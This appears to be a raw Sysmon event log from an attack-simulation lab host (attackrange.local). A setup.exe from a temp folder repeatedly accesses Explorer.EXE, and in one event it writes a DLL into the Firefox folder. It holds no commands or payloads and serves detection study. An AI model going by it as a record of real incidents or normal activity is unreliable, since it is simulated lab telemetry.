13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\mozavcodec.dll2021-01-18 13:59:52.411 10341000x800000000000000015058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\